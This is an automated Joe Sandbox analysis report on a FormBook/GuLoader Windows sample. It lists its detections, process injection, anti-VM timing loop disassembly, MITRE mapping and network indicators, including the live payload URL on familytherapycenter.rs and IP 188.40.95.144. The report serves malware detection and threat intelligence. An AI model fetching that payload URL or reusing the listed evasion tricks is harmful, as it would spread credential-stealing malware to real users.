Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5112024976.exe

Overview

General Information

Sample name:5112024976.exe
Analysis ID:1550109
MD5:35826e4e9e0db5ce7a5e95d34c34e2da
SHA1:f2aea3002a1529f56ea66478789037440702dfbd
SHA256:5a23c2b6db6ec6993f56e635a2958ed21bbf94c6920f2329fdcd9a8641ff9b6a
Infos:

Detection

FormBook, GuLoader
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Drops PE files
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • 5112024976.exe (PID: 6912 cmdline: "C:\Users\user\Desktop\5112024976.exe" MD5: 35826E4E9E0DB5CE7A5E95D34C34E2DA)
    • 5112024976.exe (PID: 6008 cmdline: "C:\Users\user\Desktop\5112024976.exe" MD5: 35826E4E9E0DB5CE7A5E95D34C34E2DA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000004.00000002.2840182888.0000000036020000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000000.00000002.2387931879.0000000004940000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      No Sigma rule has matched
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-06T13:49:05.625475+010020229301A Network Trojan was detected4.175.87.197443192.168.2.449736TCP
      2024-11-06T13:49:43.809344+010020229301A Network Trojan was detected4.175.87.197443192.168.2.449737TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-06T13:50:07.225894+010028032702Potentially Bad Traffic192.168.2.449825188.40.95.144443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 5112024976.exeAvira: detected
      Source: 5112024976.exeReversingLabs: Detection: 33%
      Source: Yara matchFile source: 00000004.00000002.2840182888.0000000036020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: 5112024976.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 188.40.95.144:443 -> 192.168.2.4:49825 version: TLS 1.2
      Source: 5112024976.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: 5112024976.exe, 00000004.00000001.2387007221.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: wntdll.pdbUGP source: 5112024976.exe, 00000004.00000003.2783579507.00000000361DE000.00000004.00000020.00020000.00000000.sdmp, 5112024976.exe, 00000004.00000002.2840209974.0000000036390000.00000040.00001000.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: 5112024976.exe, 00000004.00000003.2783579507.00000000361DE000.00000004.00000020.00020000.00000000.sdmp, 5112024976.exe, 00000004.00000002.2840209974.0000000036390000.00000040.00001000.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: 5112024976.exe, 00000004.00000001.2387007221.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.4:49736
      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.4:49737
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49825 -> 188.40.95.144:443
      Source: global trafficHTTP traffic detected: GET /FWMRlymkKxgrni33.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: familytherapycenter.rsCache-Control: no-cache
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /FWMRlymkKxgrni33.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: familytherapycenter.rsCache-Control: no-cache
      Source: global trafficDNS traffic detected: DNS query: familytherapycenter.rs
      Source: 5112024976.exe, 00000000.00000000.1685837928.000000000040A000.00000008.00000001.01000000.00000003.sdmp, 5112024976.exe, 00000000.00000002.2387181715.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 5112024976.exe, 00000004.00000000.2384311317.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: 5112024976.exe, 00000000.00000000.1685837928.000000000040A000.00000008.00000001.01000000.00000003.sdmp, 5112024976.exe, 00000000.00000002.2387181715.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 5112024976.exe, 00000004.00000000.2384311317.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: 5112024976.exe, 00000004.00000001.2387007221.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: 5112024976.exe, 00000004.00000001.2387007221.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: 5112024976.exe, 00000004.00000001.2387007221.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: 5112024976.exe, 00000004.00000003.2781835541.00000000060A5000.00000004.00000020.00020000.00000000.sdmp, 5112024976.exe, 00000004.00000002.2820137244.00000000060A7000.00000004.00000020.00020000.00000000.sdmp, 5112024976.exe, 00000004.00000002.2839943614.00000000357A0000.00000004.00001000.00020000.00000000.sdmp, 5112024976.exe, 00000004.00000002.2820071634.0000000006058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://familytherapycenter.rs/FWMRlymkKxgrni33.bin
      Source: 5112024976.exe, 00000004.00000002.2820071634.0000000006058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://familytherapycenter.rs/FWMRlymkKxgrni33.bin-
      Source: 5112024976.exe, 00000004.00000003.2781835541.00000000060A5000.00000004.00000020.00020000.00000000.sdmp, 5112024976.exe, 00000004.00000002.2820137244.00000000060A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://familytherapycenter.rs/FWMRlymkKxgrni33.bin1
      Source: 5112024976.exe, 00000004.00000002.2820071634.0000000006058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://familytherapycenter.rs/FWMRlymkKxgrni33.binu
      Source: 5112024976.exe, 00000004.00000001.2387007221.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
      Source: unknownHTTPS traffic detected: 188.40.95.144:443 -> 192.168.2.4:49825 version: TLS 1.2

      E-Banking Fraud

      barindex
      Source: Yara matchFile source: 00000004.00000002.2840182888.0000000036020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\5112024976.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\5112024976.exeFile created: C:\Windows\resources\soenderbro.iniJump to behavior
      Source: 5112024976.exeStatic PE information: invalid certificate
      Source: 5112024976.exe, 00000004.00000003.2783579507.000000003630B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 5112024976.exe
      Source: 5112024976.exe, 00000004.00000002.2840209974.00000000364BD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 5112024976.exe
      Source: 5112024976.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal84.troj.evad.winEXE@3/10@1/1
      Source: C:\Users\user\Desktop\5112024976.exeFile created: C:\Users\user\AppData\Roaming\secretaryshipsJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeFile created: C:\Users\user\AppData\Local\Temp\nsw832.tmpJump to behavior
      Source: 5112024976.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\5112024976.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: 5112024976.exeReversingLabs: Detection: 33%
      Source: C:\Users\user\Desktop\5112024976.exeFile read: C:\Users\user\Desktop\5112024976.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\5112024976.exe "C:\Users\user\Desktop\5112024976.exe"
      Source: C:\Users\user\Desktop\5112024976.exeProcess created: C:\Users\user\Desktop\5112024976.exe "C:\Users\user\Desktop\5112024976.exe"
      Source: C:\Users\user\Desktop\5112024976.exeProcess created: C:\Users\user\Desktop\5112024976.exe "C:\Users\user\Desktop\5112024976.exe"Jump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: 5112024976.exeStatic file information: File size 1224768 > 1048576
      Source: 5112024976.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: 5112024976.exe, 00000004.00000001.2387007221.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: wntdll.pdbUGP source: 5112024976.exe, 00000004.00000003.2783579507.00000000361DE000.00000004.00000020.00020000.00000000.sdmp, 5112024976.exe, 00000004.00000002.2840209974.0000000036390000.00000040.00001000.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: 5112024976.exe, 00000004.00000003.2783579507.00000000361DE000.00000004.00000020.00020000.00000000.sdmp, 5112024976.exe, 00000004.00000002.2840209974.0000000036390000.00000040.00001000.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: 5112024976.exe, 00000004.00000001.2387007221.0000000000649000.00000020.00000001.01000000.00000007.sdmp

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000000.00000002.2387931879.0000000004940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\5112024976.exeFile created: C:\Users\user\AppData\Local\Temp\nsw91D.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\5112024976.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\5112024976.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\5112024976.exeAPI/Special instruction interceptor: Address: 4A99C2F
      Source: C:\Users\user\Desktop\5112024976.exeAPI/Special instruction interceptor: Address: 3659C2F
      Source: C:\Users\user\Desktop\5112024976.exeRDTSC instruction interceptor: First address: 4A62F57 second address: 4A62F57 instructions: 0x00000000 rdtsc 0x00000002 test dh, bh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F1C90FE14E3h 0x00000008 test cx, cx 0x0000000b inc ebp 0x0000000c cmp bl, al 0x0000000e inc ebx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\5112024976.exeRDTSC instruction interceptor: First address: 3622F57 second address: 3622F57 instructions: 0x00000000 rdtsc 0x00000002 test dh, bh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F1C90FD71C3h 0x00000008 test cx, cx 0x0000000b inc ebp 0x0000000c cmp bl, al 0x0000000e inc ebx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\5112024976.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsw91D.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\5112024976.exe TID: 4080Thread sleep time: -30000s >= -30000sJump to behavior
      Source: 5112024976.exe, 00000004.00000002.2820071634.0000000006058000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
      Source: 5112024976.exe, 00000004.00000003.2781835541.00000000060AE000.00000004.00000020.00020000.00000000.sdmp, 5112024976.exe, 00000004.00000002.2820137244.00000000060AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWY
      Source: 5112024976.exe, 00000004.00000003.2781835541.00000000060AE000.00000004.00000020.00020000.00000000.sdmp, 5112024976.exe, 00000004.00000002.2820137244.00000000060AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\5112024976.exeProcess created: C:\Users\user\Desktop\5112024976.exe "C:\Users\user\Desktop\5112024976.exe"Jump to behavior

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000004.00000002.2840182888.0000000036020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000004.00000002.2840182888.0000000036020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
      DLL Side-Loading
      11
      Process Injection
      11
      Masquerading
      OS Credential Dumping21
      Security Software Discovery
      Remote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading
      1
      Virtualization/Sandbox Evasion
      LSASS Memory1
      Virtualization/Sandbox Evasion
      Remote Desktop ProtocolData from Removable Media2
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
      Process Injection
      Security Account Manager1
      File and Directory Discovery
      SMB/Windows Admin SharesData from Network Shared Drive13
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      DLL Side-Loading
      NTDS21
      System Information Discovery
      Distributed Component Object ModelInput Capture1
      Ingress Tool Transfer
      Traffic DuplicationData Destruction
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      5112024976.exe33%ReversingLabs
      5112024976.exe100%AviraHEUR/AGEN.1361137
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsw91D.tmp\System.dll0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://familytherapycenter.rs/FWMRlymkKxgrni33.binu0%Avira URL Cloudsafe
      https://familytherapycenter.rs/FWMRlymkKxgrni33.bin10%Avira URL Cloudsafe
      https://familytherapycenter.rs/FWMRlymkKxgrni33.bin-0%Avira URL Cloudsafe
      https://familytherapycenter.rs/FWMRlymkKxgrni33.bin0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      familytherapycenter.rs
      188.40.95.144
      truefalse
        high
        NameMaliciousAntivirus DetectionReputation
        https://familytherapycenter.rs/FWMRlymkKxgrni33.binfalse
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd5112024976.exe, 00000004.00000001.2387007221.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
          high
          https://familytherapycenter.rs/FWMRlymkKxgrni33.binu5112024976.exe, 00000004.00000002.2820071634.0000000006058000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.ftp.ftp://ftp.gopher.5112024976.exe, 00000004.00000001.2387007221.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
            high
            http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd5112024976.exe, 00000004.00000001.2387007221.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
              high
              https://familytherapycenter.rs/FWMRlymkKxgrni33.bin15112024976.exe, 00000004.00000003.2781835541.00000000060A5000.00000004.00000020.00020000.00000000.sdmp, 5112024976.exe, 00000004.00000002.2820137244.00000000060A7000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://nsis.sf.net/NSIS_Error5112024976.exe, 00000000.00000000.1685837928.000000000040A000.00000008.00000001.01000000.00000003.sdmp, 5112024976.exe, 00000000.00000002.2387181715.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 5112024976.exe, 00000004.00000000.2384311317.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                high
                http://nsis.sf.net/NSIS_ErrorError5112024976.exe, 00000000.00000000.1685837928.000000000040A000.00000008.00000001.01000000.00000003.sdmp, 5112024976.exe, 00000000.00000002.2387181715.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 5112024976.exe, 00000004.00000000.2384311317.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                  high
                  https://familytherapycenter.rs/FWMRlymkKxgrni33.bin-5112024976.exe, 00000004.00000002.2820071634.0000000006058000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2145112024976.exe, 00000004.00000001.2387007221.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                    high
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    188.40.95.144
                    familytherapycenter.rsGermany
                    24940HETZNER-ASDEfalse
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1550109
                    Start date and time:2024-11-06 13:47:54 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 5m 8s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:6
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:5112024976.exe
                    Detection:MAL
                    Classification:mal84.troj.evad.winEXE@3/10@1/1
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • VT rate limit hit for: 5112024976.exe
                    TimeTypeDescription
                    07:50:37API Interceptor3x Sleep call for process: 5112024976.exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    188.40.95.144Anfrage24438.zipGet hashmaliciousFormBook, GuLoaderBrowse
                      Anfrage24438.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        Anfrage24438.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          familytherapycenter.rsAnfrage24438.zipGet hashmaliciousFormBook, GuLoaderBrowse
                          • 188.40.95.144
                          Anfrage24438.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • 188.40.95.144
                          Anfrage24438.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • 188.40.95.144
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          HETZNER-ASDEAnfrage24438.zipGet hashmaliciousFormBook, GuLoaderBrowse
                          • 188.40.95.144
                          getscreen-868841125.exeGet hashmaliciousUnknownBrowse
                          • 78.47.165.25
                          getscreen-868841125.exeGet hashmaliciousUnknownBrowse
                          • 78.47.165.25
                          Anfrage24438.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • 188.40.95.144
                          Anfrage24438.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • 188.40.95.144
                          DeGrsOm654.exeGet hashmaliciousQuasarBrowse
                          • 195.201.57.90
                          PO_11000262.vbsGet hashmaliciousFormBookBrowse
                          • 148.251.114.233
                          https://me-qr.com/f/tritonstone?hash=Get hashmaliciousUnknownBrowse
                          • 49.12.126.78
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          37f463bf4616ecd445d4a1937da06e19Justificante de pago.exeGet hashmaliciousGuLoaderBrowse
                          • 188.40.95.144
                          Anfrage24438.zipGet hashmaliciousFormBook, GuLoaderBrowse
                          • 188.40.95.144
                          Transferencia.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • 188.40.95.144
                          Anfrage24438.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • 188.40.95.144
                          Anfrage24438.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • 188.40.95.144
                          NTU #U5831#U50f9#U8acb#U6c42#U9805#U76ee FMD2024UOS#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                          • 188.40.95.144
                          2024-11-05-5910184618-5910184618-fs#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                          • 188.40.95.144
                          Quarto Proyectos S.L LISTA DE COMPRAS.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • 188.40.95.144
                          JkYvyHHOr8.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                          • 188.40.95.144
                          y4jxkrdxZr.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                          • 188.40.95.144
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          C:\Users\user\AppData\Local\Temp\nsw91D.tmp\System.dllAnfrage24438.zipGet hashmaliciousFormBook, GuLoaderBrowse
                            Anfrage24438.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              Anfrage24438.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                21st OCTOBER 2024 234876sdf ORDER_PDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                  21st OCTOBER 2024 234876sdf ORDER_PDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    Purchase Order.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                      Documenti di spedizione.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                        DHL AWB - COMMERCIAL INVOICE AND BL.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          Process:C:\Users\user\Desktop\5112024976.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):11264
                                          Entropy (8bit):5.7711167426271945
                                          Encrypted:false
                                          SSDEEP:192:OPtkumJX7zB22kGwfy0mtVgkCPOsX1un:/702k5qpdsXQn
